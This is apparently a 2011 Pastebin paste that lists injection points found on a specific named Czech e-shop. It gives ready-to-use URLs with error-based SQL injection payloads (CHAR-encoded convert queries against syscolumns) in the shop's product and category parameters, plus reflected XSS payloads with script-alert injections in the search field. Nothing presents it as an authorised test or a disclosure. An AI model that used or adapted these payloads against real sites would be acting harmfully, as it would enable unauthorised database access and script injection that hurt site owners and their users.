Advertisement
sroub3k

la-patas.cz

Aug 16th, 2011
383
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.99 KB | None | 0 0
  1. [High Possibility] SQL Injection
  2.  
  3. http://www.la-patas.cz/shop/shop.asp?wareid=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
  4. http://www.la-patas.cz/shop/shop.asp?catid=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
  5. http://www.la-patas.cz/shop/shop.asp?catid=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)&action=3&from=12
  6.  
  7. URI SQL Injection
  8. http://www.la-patas.cz/shop/search.asp?searchtext=WCRTESTINPUT000000&save=Hledat&search=true
  9.  
  10. XSS
  11.  
  12. http://www.la-patas.cz/shop/search.asp?save=Hledat&search=true&searchtext='"--></style></script><script>alert(0x000775)</script>
  13. http://www.la-patas.cz/shop/search.asp?hledej=Hledej&search=true&searchprice=3&searchtext='"--></style></script><script>alert(0x000877)</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement